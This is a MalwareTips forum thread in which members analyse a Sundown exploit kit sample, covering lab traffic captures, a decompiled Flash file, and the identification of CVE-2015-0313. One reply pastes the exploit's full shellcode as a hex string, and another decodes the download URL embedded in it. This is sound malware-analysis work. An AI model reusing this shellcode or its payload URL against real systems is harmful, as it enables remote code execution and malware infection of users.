Malware Analysis A look at Sundown exploit kit

MBYX

Level 1
Thread author
Verified
Jan 19, 2017
40
A look at Sundown exploit kit.
So recently a range of things have drawn my personal interest, one of them is understanding EK (exploit kits) more anyone in IT knows the best defense against attack is to understand the attack fully.
Understand the attack and thus where or how to break it and render it useless.
Sundown recently drew my interest as I was used to pouring over RIG EK, RIG EK … and look more….RIG EK…
Here was something different GREAT! So I got hold of two samples of sundown using flash exploit. Okay Flash .. heaps of exploits there but we will come back to that .. lets see what this little guy does.
Sundown was delivering through a email campaign leading to a gate, landing page and payload delivery.
01.jpg

Here we can see
  • 192.168.5.56 (Win7VM my lab machine)
  • 192.158.5.1(Kali:MITM proxy&Wireshark capture)
  • 204.79.197.200 (Markmonitor)
  • 239.255.255.250 (IANA) Internet Assigned Numbers Authority
  • Some ipv6 traffic after that.

The EK points to DNS which Looks like the good guys redirected already, nice work.
We then see some TCP packets occurring, no8 we see a favicon.ico been requested which is a small icon file (no12 .PNG type)
We then see a heap of SSDP packets(no14+) which is foundation plug and play (local network discovery)
Further down I see another DNS request for an akamaiedge (conference hosting site) session before the Markmonitor sends a RESET ACK request relating to the ICO file mentioned above.
Beyond that it’s a repeat so to me it looks like the good guys are already blocking the EK from hitting its landing page.
02.jpg


Beyond that I saw some DHCPv6 traffic and the EK still trying to work out the local network

03.jpg

So…. Now what.
Well I asked myself okay the packet capture did not give me a lot. What else can I learn…
We know this EK is using a flash exploit, its using SWF filetype (Shockwave Flash) but what if I actually wanted to know which SWF exploit it was…

Look in the SWF

what you mean “look in the SWF”

I mean open him up

Its not a tin of baked beans! What do you mean “open him up”

You know what I mean

That’s a bit strong ain’t it. I don’t know about this.



So De-compiler in hand I opened it up looking to try identify the particular exploit it was using. I was drawn first to function “Go” and this line (loc_7) which looked like an overflow attack and in general I was getting a feel for a lot of data been written to memory locations.

04.jpg

Go_var1 was set to execute GO and also extend the ByteArrayAsset … interesting..

05.jpg


So this sent me down a path of looking for overflow attacks against byteArrayAssets under the mx core …

OH …. Look a github page showing how CVE-2015-0313 works…

06.jpg

Researching CVE-2015-0313 (Use after free) refers to bytearray been freed from an actionscript worker which can FILL THE MEMORY and notify the main thread to corrupt the new contents. Which then allows for remote code execution.
I concluded at this point that CVE-2015-0313 was been used.

Thankyou
MBYX

No SWF’s were harmed in the making, bonus points for the movie reference :)
 

MBYX

Level 1
Thread author
Verified
Jan 19, 2017
40
Great analysis and work, thank you :)

Have you tried to disassemble the shell-code that is put in the loc_7 var , under its String representing Hex values) ?
not yet wasn't sure i was going to.. just looks like a pile of crap used to cause a overflow, not sure there would be much merrit in it i can dig out the line if you want to have a play?
 
  • Like
Reactions: frogboy and DardiM

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
i can dig out the line if you want to have a play?
At first sight, loc_7 doesn't content the same shellcode I analysed some weeks ago. It still begins by a jump (EBxy), but the other parts are different (I suppose it uses the same trick to obfuscate the important parts, but not the same values for obfuscation).
I am a very curious Penguin, and will be a "happy feet" to get the whole string put in the loc_7 var, to see if the main obfuscated command line inside is the same.

Again, nice analysis, looking forward your next :)
 
Last edited:

MBYX

Level 1
Thread author
Verified
Jan 19, 2017
40
At first sight, loc_7 doesn't content the same shellcode I analysed some weeks ago. It still begins by a jump (EBxy), but the other parts are different (I suppose it uses the same trick to obfuscate the important parts, but not the same values for obfuscation).
I am a very curious Penguin, and will be a "happy feet" to get the whole string put in the loc_7 var, to see if the main obfuscated command line inside is the same.

Again, nice analysis, looking forward your next :)


is this what you need ?
if you get anything out of this would be interested to learn how, can pm me, happy to follow bread crumbs.
was a pain in the arse due to the eval software i was using..had to get new software, which required supporting software and oh no i found dependency hell again ... and i was on windows :)


_loc3_.position = 0;
var _loc7_:String = "EB5031F6648B76308B760C8B761C8B6E088B368B5D3C8B5C1D7801EB8B4B1867E3EC8B7B2001EF8B7C8FFC01EF31C0990217C1CA04AE75F83B542404E0E475CE8B532401EA0FB7144A8B7B1C01EF032C97C3688E488B63E8A6FFFFFF66B86C6C50686F6E2E646875726C6D54FFD568832B76F6E88AFFFFFFE82D00000031DB535350E9CF010000585053FFD568E7C4CC69E86CFFFFFF504C4C4C4CFFD56877A6602AE85BFFFFFF50FFD564A1180000008B40308B40108B404883E802E9830000005EB90600000083C002668B1C08668B140E6639D375EB49E0F083C00831C983C10266833C080075F6EB665F57FC89C6F3A483C70289F85FE801000000C331C931D28A1C17881C084183C20280FB0075F149C604085C41C604085441C604086541C604086D41C604087041C604082E41C604086541C604087841C604086541C6040800C3E878FFFFFF54004D0050003D00E895FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000E82CFEFFFF687474703A2F2F6B6C682E79746C7A672E78797A2F652E7068700000009090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090";
var _loc8_:uint = _loc7_.length;
var _loc9_:* = 0;
_loc6_ = 0;
while(_loc6_ < _loc4_ - 4)
 

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
is this what you need ?
if you get anything out of this would be interested to learn how, can pm me, happy to follow bread crumbs.
was a pain in the arse due to the eval software i was using..had to get new software, which required supporting software and oh no i found dependency hell again ... and i was on windows :)

Thanks for the code :)

The string in the var _loc_7 :

It is the shellcode

=> can be disassembled (using the content)
=> often contains obfuscation parts to make it harder to be understood , when disassembled.
A quick Look here : between the numrous 000000... and 90909090...

"E82CFEFFFF687474703A2F2F6B6C682E79746C7A672E78797A2F652E70687"

In red :

h t t p : / / klh.ytlzg.xyz/e.php
upload_2017-3-28_17-43-41.png


x00 => can be use to put the real part
x90 => nop : no operation.

All the shellcode can be disassembled and analysed :

Edited :
I made a separate thread (changed from clues, to deeper analyse)

https://malwaretips.com/threads/analyse-of-a-shellcode.70044/

Thanks again for your shellcode :)
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top